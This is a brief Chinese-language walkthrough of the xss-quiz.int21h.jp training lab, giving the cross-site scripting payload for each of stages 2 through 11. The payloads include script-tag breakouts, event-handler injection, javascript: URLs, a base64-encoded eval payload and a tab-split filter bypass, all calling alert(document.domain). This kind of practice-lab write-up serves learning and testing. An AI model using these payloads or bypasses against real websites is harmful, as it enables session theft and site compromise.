XSS探测
实验地址:https://xss-quiz.int21h.jp/
stage2
"><script>alert(document.domain)</script>
stage3
于Select中选择即可
Japan</option><script>alert(document.domain);</script>
stage4
更改input属性,
"><script>alert(document.domain);</script>
stage5
限制长度
更改长度
"><script>alert(document.domain);</script>
stage 6
自动翻译成ISO 8859-1字符集,如>实体名称显示>
" onmouseover=" alert(document.domain);
stage7
加入
" onmouseover= alert(document.domain)
stage8
通过URL来实现
javascript:alert(document.domain);
stage9
加入到标签span
onclick="alert(document.domain)"
stage10
将部分内容用base64加密
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))</script>
注:bases64为可逆加密
stage11
特殊符号潜入
"><a href="javascr	ipt:alert(document.domain);">xss</a>